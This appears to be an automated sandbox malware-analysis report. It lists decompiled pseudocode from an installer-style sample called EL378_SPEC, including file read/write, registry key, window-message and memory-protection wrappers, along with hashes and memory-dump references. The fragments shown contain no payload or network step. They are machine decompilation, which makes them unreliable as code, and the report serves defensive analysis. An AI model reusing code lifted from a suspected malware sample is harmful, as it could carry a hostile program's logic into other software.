				if( *0x6ecc5024 != 0 && E6ECC1BC1(_a4) == 0) {
					 *0x6ecc5030 = _t86;
					if( *0x6ecc5034 != 0) {
						_t86 =  *0x6ecc5034;
					} else {
						E6ECC3250(E6ECC1C43());
						 *0x6ecc5034 = _t86;
					}
				}
				_t28 = E6ECC1C49(_a4);
				_t87 = _t86 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6ECC1BBB();
					_t67 = _a4;
					_t74 =  *0x6ecc5028;
					 *((intOrPtr*)(_t29 + _t67)) = _t74;
					 *0x6ecc5028 = _t67;
					E6ECC1C5A();
					_t33 = EnumWindows(??, ??); // executed
					 *0x6ecc5000 = _t33;
					 *0x6ecc5004 = _t74;
					if( *0x6ecc5024 != 0 && E6ECC1BC1( *0x6ecc5028) == 0) {
						 *0x6ecc5034 = _t87;
						_t87 =  *0x6ecc5030;
					}
					_t75 =  *0x6ecc5028;
					_a4 = _t75;
					 *0x6ecc5028 =  *((intOrPtr*)(E6ECC1BBB() + _t75));
					_t37 = E6ECC1BAD(_t75);
					_pop(_t76);
					if(_t37 != 0) {
						_t37 = E6ECC1C49(_t76);
						if(_t37 > 0) {
							_push(_t37);
							_push(E6ECC1C54() + _a4 + _v8);
							_push(E6ECC1C64());
							if( *0x6ecc5024 <= 0 || E6ECC1BC1(_a4) != 0) {
								_pop(_t81);
								_pop(_t44);
								if( *((intOrPtr*)(_t44 + _t81)) == 2) {
								}
								_pop(_t76);
								_t37 = _t44 + _v8;
								asm("loop 0xfffffff5");
							} else {
								_pop(_t82);
								_pop(_t47);
								_t78 =  *(_t47 + _t82);
								_t64 =  *0x6ecc5034;
								_t76 = _t64 + _t78 * 4;
								 *0x6ecc5034 = _t64 + _t78 * 4;
								_t37 = _t47 + _v8;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x6ecc5028 == 0) {
						 *0x6ecc5034 = 0;
					}
					_push( *0x6ecc5004);
					E6ECC2CBF(_t37, _t64, _t76, _a4,  *0x6ecc5000);
					return _a4;
				}
				_push(E6ECC1C54() + _a4);
				_t53 = E6ECC1C60();
				_v8 = _t53;
				_t72 = _t28;
				_push(_t65 + _t53 * _t72);
				_t64 = E6ECC1CC3();
				_t80 = E6ECC1CBF();
				_t83 = E6ECC1C64();
				_t58 = _t72;
				if( *((intOrPtr*)(_t58 + _t83)) == 2) {
					_push( *((intOrPtr*)(_t58 + _t64)));
				}
				_push( *((intOrPtr*)(_t58 + _t80)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x6ecc2d24
0x6ecc2d35
0x6ecc2d42
0x6ecc2d56
0x6ecc2d44
0x6ecc2d49
0x6ecc2d4e
0x6ecc2d4e
0x6ecc2d42
0x6ecc2d5f
0x6ecc2d64
0x6ecc2d6a
0x6ecc2dae
0x6ecc2dae
0x6ecc2db3
0x6ecc2db8
0x6ecc2dbe
0x6ecc2dc0
0x6ecc2dc6
0x6ecc2dd3
0x6ecc2dd5
0x6ecc2dda
0x6ecc2de7
0x6ecc2dfa
0x6ecc2e00
0x6ecc2e06
0x6ecc2e07
0x6ecc2e0d
0x6ecc2e19
0x6ecc2e1f
0x6ecc2e27
0x6ecc2e28
0x6ecc2e2b
0x6ecc2e36
0x6ecc2e38
0x6ecc2e44
0x6ecc2e4a
0x6ecc2e52
0x6ecc2e7e
0x6ecc2e7f
0x6ecc2e85
0x6ecc2e85
0x6ecc2e88
0x6ecc2e89
0x6ecc2e8c
0x6ecc2e62
0x6ecc2e62
0x6ecc2e63
0x6ecc2e65
0x6ecc2e68
0x6ecc2e6e
0x6ecc2e71
0x6ecc2e77
0x6ecc2e7a
0x6ecc2e7a
0x6ecc2e52
0x6ecc2e36
0x6ecc2e95
0x6ecc2e97
0x6ecc2e97
0x6ecc2ea1
0x6ecc2eb0
0x6ecc2ebe
0x6ecc2ebe
0x6ecc2d75
0x6ecc2d76
0x6ecc2d7b
0x6ecc2d7f
0x6ecc2d84
0x6ecc2d98
0x6ecc2d99
0x6ecc2d9a
0x6ecc2d9c
0x6ecc2da1
0x6ecc2da3
0x6ecc2da3
0x6ecc2da6
0x6ecc2dac
0x00000000

APIs

EnumWindows.USER32(?), ref: 6ECC2DD3

Memory Dump Source

Source File: 00000000.00000002.15063213998.000000006ECC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.15063182408.000000006ECC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063255603.000000006ECC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063283859.000000006ECC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_EL378_SPEC.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 7612d250be79f96d55952c131eae9cc55a7cd97b73273b5f96c31a4bd2a975b2
Instruction ID: db3edf4dc24563feb72e1bd41155f46bd086ca04a99328723da30e3dd8b7fa46
Opcode Fuzzy Hash: 7612d250be79f96d55952c131eae9cc55a7cd97b73273b5f96c31a4bd2a975b2
Instruction Fuzzy Hash: E6419EB5900A04DFDF049FE9DAA8B8937B8EB45F59F20482AE514DB214F734D585CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00402566 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402566(void* __ecx, WCHAR* __ebp, void* _a12, intOrPtr _a40, intOrPtr _a56) {
				int _t4;
				intOrPtr _t9;
				void* _t13;
				WCHAR* _t14;
				WCHAR* _t16;
				WCHAR* _t18;
				void* _t20;

				_t18 = __ebp;
				_t16 = __ebp;
				_t14 = __ebp;
				if(__ecx != 0) {
					__ebp = E0040303E(__edx, __ebp);
				}
				if(_t4 != 0) {
					_t16 = E0040303E(_t13, 0x11);
				}
				if(_a56 != _t14) {
					_t14 = E0040303E(_t13, 0x22);
				}
				_t4 = WritePrivateProfileStringW(_t18, _t16, _t14, E0040303E(_t13, 0xffffffcd)); // executed
				if(_t4 != 0) {
					_t9 =  *((intOrPtr*)(_t20 + 0x10));
				} else {
					_t9 = 1;
				}
				 *0x435ac8 =  *0x435ac8 + _t9;
				return 0;
			}

0x00402566
0x00402566
0x00402568
0x0040256c
0x00402574
0x00402576
0x0040257c
0x00402585
0x00402585
0x0040258b
0x00402594
0x00402594
0x004025a1
0x00401703
0x00402ea1
0x00401709
0x0040170b
0x0040170b
0x00402ea5
0x00402eb7

APIs

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 004025A1

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 9af0a1d878fae9e3e89ffa2e9034ec420723555003de84cdee57c9f052185a13
Instruction ID: f65784f0cf837312192d28317bace7b0ee78b13f5a7e28397f60b6fd89985110
Opcode Fuzzy Hash: 9af0a1d878fae9e3e89ffa2e9034ec420723555003de84cdee57c9f052185a13
Instruction Fuzzy Hash: 90E09A32505254BAD6703A738C09B2B299C5B407A2B64023FB806B22CAE9F98E01812D

Uniqueness

Uniqueness Score: -1.00%

Function 00406948 Relevance: 1.5, APIs: 1, Instructions: 24
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406948(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t7;
				long _t11;
				struct _OVERLAPPED* _t14;

				_t11 = _a12;
				_t14 = 0;
				_t7 = ReadFile(_a4, _a8, _t11,  &_v8, 0); // executed
				if(_t7 != 0 && _t11 == _v8) {
					_t14 = 1;
				}
				return _t14;
			}

0x0040694e
0x00406954
0x0040695f
0x00406967
0x0040696e
0x0040696e
0x00406974

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,?,?,00000000,00000000,00000000,00000000), ref: 0040695F

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 2db7c5b5d383cb428e65bf87e114ea6cc39ae6a838efe8624f6ef6c49ed421ec
Instruction ID: 496ccccc8c492c243bc388fe3eb656b5cfb520ee4410d2fb8332981663b8a2fe
Opcode Fuzzy Hash: 2db7c5b5d383cb428e65bf87e114ea6cc39ae6a838efe8624f6ef6c49ed421ec
Instruction Fuzzy Hash: 38E04672200229BBCF209B9ADC08D9FBFADEE957A07024026B805A3110D270EE21C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 00406A0B Relevance: 1.5, APIs: 1, Instructions: 24
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A0B(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t7;
				long _t11;
				struct _OVERLAPPED* _t14;

				_t11 = _a12;
				_t14 = 0;
				_t7 = WriteFile(_a4, _a8, _t11,  &_v8, 0); // executed
				if(_t7 != 0 && _t11 == _v8) {
					_t14 = 1;
				}
				return _t14;
			}

0x00406a11
0x00406a17
0x00406a22
0x00406a2a
0x00406a31
0x00406a31
0x00406a37

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,0041F538,00403348,?,0041F538,?,0041F538,?,?), ref: 00406A22

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: df327e9a7695e02a5bae04bfea65e0978199b1218c5bef36048a46936c94f75f
Instruction ID: 40df579de253d7cbce13811cecf730e98513d225cd3d08ff0a4c9fddec416105
Opcode Fuzzy Hash: df327e9a7695e02a5bae04bfea65e0978199b1218c5bef36048a46936c94f75f
Instruction Fuzzy Hash: F9E0BF32600129BBCF205B5ADC04E9FFF6DEE926A07114026F905A2150E670EE11DAE4

Uniqueness

Uniqueness Score: -1.00%

Function 004062A5 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062A5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406120(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004062af
0x004062b6
0x004062ce
0x00000000
0x004062ce
0x004062ba
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062CE

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9d74b961b3018e30b71e857dcddf3078069952a5892463cd94a54035f436c205
Instruction ID: 8015555a5faba5d47a7295c794b4dc45a0f837954a803b2f281cb622c6ff763f
Opcode Fuzzy Hash: 9d74b961b3018e30b71e857dcddf3078069952a5892463cd94a54035f436c205
Instruction Fuzzy Hash: 38E0B6B201020ABEEF096F90DC0ADBB7A5DEB08310F00492EFA0694091E6B5AD30A634

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC1A4A Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6ecc5014 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6ecc501c, "true", "true", 0x6ecc5034); // executed
					 *0x6ecc501c = 0xc2;
					 *0x6ecc5034 = 0;
					 *0x6ecc5030 = 0;
					 *0x6ecc502c = 0;
					 *0x6ecc5028 = 0;
					 *0x6ecc5024 = 0;
					 *0x6ecc5020 = 0;
					 *0x6ecc501e = 0;
				}
				return 1;
			}

0x6ecc1a53
0x6ecc1a58
0x6ecc1a68
0x6ecc1a70
0x6ecc1a77
0x6ecc1a7d
0x6ecc1a83
0x6ecc1a89
0x6ecc1a8f
0x6ecc1a95
0x6ecc1a9b
0x6ecc1a9b
0x6ecc1aa4

APIs

VirtualProtect.KERNELBASE(6ECC501C,?,?,6ECC5034), ref: 6ECC1A68

Memory Dump Source

Source File: 00000000.00000002.15063213998.000000006ECC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.15063182408.000000006ECC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063255603.000000006ECC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063283859.000000006ECC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_EL378_SPEC.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0eae238ad20e5d7064c145afb1d60ac976a6e1f5c06610dfc95bad7c4364f8fb
Instruction ID: 57d467e26346543387bf6e40ae310961940a6e796acba47d3fede11594ee5c9d
Opcode Fuzzy Hash: 0eae238ad20e5d7064c145afb1d60ac976a6e1f5c06610dfc95bad7c4364f8fb
Instruction Fuzzy Hash: BFF059B0959B40DACB18CF699A8C60A7AF0B71BF55B00852EF27ADA340D37045059F9A

Uniqueness

Uniqueness Score: -1.00%

Function 004062D8 Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406120(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004062e2
0x004062e9
0x004062fc
0x00000000
0x004062fc
0x004062ed
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,00000000,00000800,?,?,004069A5,00000800,?,?,?,Call,00000000,00000000), ref: 004062FC

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6046d274b78c3224a6ad722eb80787644d3a57436a5b6bc7b2547111f35c777e
Instruction ID: 212ff8f8ceecf1c7f7b975949926931c9c9ff354a47ded1b1035142b567bad43
Opcode Fuzzy Hash: 6046d274b78c3224a6ad722eb80787644d3a57436a5b6bc7b2547111f35c777e
Instruction Fuzzy Hash: 81D0123204020EBBDF116F909D05FAB3B2DAB08340F004436FE06A4091D775D930A758

Uniqueness

Uniqueness Score: -1.00%

Function 004054E8 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054E8(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x4349dc;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004054e8
0x004054ef
0x004054fa
0x00000000
0x004054fa
0x00405500

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e4e95d0fddce0dc824c6f013e603094366fa7490cb3008435431beda4080c4b1
Instruction ID: f4f70a023dfa60edfff8c312ec9360925e699ce3f775cceab6ab340ddbd6ed3a
Opcode Fuzzy Hash: e4e95d0fddce0dc824c6f013e603094366fa7490cb3008435431beda4080c4b1
Instruction Fuzzy Hash: BFC04C716402407ADA109B619D09F477755AB90700F5094257200E51E4D674F410CA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00405503 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405503(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x4349f8, "true", _a4, "true"); // executed
				return _t2;
			}

0x00405511
0x00405517

APIs

SendMessageW.USER32(?,?,?,00405338), ref: 00405511

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0b1b9ea5971de38bd84785100290da62d9cd6102021a2a242e6f148554a4776c
Instruction ID: 6de71dbe5e5d375af2ff60806ac132807507260846fa189ddd953f73e58556b8
Opcode Fuzzy Hash: 0b1b9ea5971de38bd84785100290da62d9cd6102021a2a242e6f148554a4776c
Instruction Fuzzy Hash: 5EB092B5181201BADA919B10DD09F8A7B62ABA4702F028564B200640B0C7B214A0DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403131(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40b010, _a4, 0, 0); // executed
				return _t2;
			}

0x0040313f
0x00403145

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035D7,?,?,?,?,?,?), ref: 0040313F

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 05fd317d58219744d4d36f9992a09dc30e109d4b8129d559949c0663f1233a42
Instruction ID: 0f2f3f991563ac80fd27f5aa645e2e28db5cd0803139906cd9636725fed969f3
Opcode Fuzzy Hash: 05fd317d58219744d4d36f9992a09dc30e109d4b8129d559949c0663f1233a42
Instruction Fuzzy Hash: D2B01231240200BFEA214F00DE0AF067B21F7D0700F10C830B360780F183711460EB4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040211B Relevance: 1.3, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040211B(void* _a24, void* _a32) {
				void* _v0;
				void* _v4;
				void* __ebp;
				void* _t9;
				void* _t15;
				void* _t20;

				_t17 = E0040303E(_t15, _t20);
				E00405D3A(0xffffffeb, _t7);
				_t9 = E004066D6(_t17); // executed
				if(_t9 != 0) {
					if( *((intOrPtr*)(__esp + 0x30)) != __ebp) {
						__eax = E00406514(__ecx, __esi);
						if( *((intOrPtr*)(__esp + 0x2c)) < __ebp) {
							0 = 1;
							 *((intOrPtr*)(__esp + 0x10)) = __ebx;
						} else {
							__eax = E0040661F( *((intOrPtr*)(__esp + 0x18)), __eax);
						}
					}
					_push(__esi);
					__eax = CloseHandle();
					__ebx =  *((intOrPtr*)(__esp + 0x10));
				}
				 *0x435ac8 =  *0x435ac8 + 1;
				return 0;
			}

0x00402121
0x00402126
0x0040212c
0x00402139
0x00402143
0x00402146
0x0040214f
0x0040215f
0x00402165
0x00402151
0x00402156
0x00402156
0x0040214f
0x00402169
0x00402110
0x00402ea1
0x00402ea1
0x00402ea5
0x00402eb7

APIs

Part of subcall function 00405D3A: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?,00000000,?,?), ref: 00405D6C
Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?,00000000,?,?), ref: 00405D7E
Part of subcall function 00405D3A: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?), ref: 00405D99
Part of subcall function 00405D3A: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll), ref: 00405DB1
Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
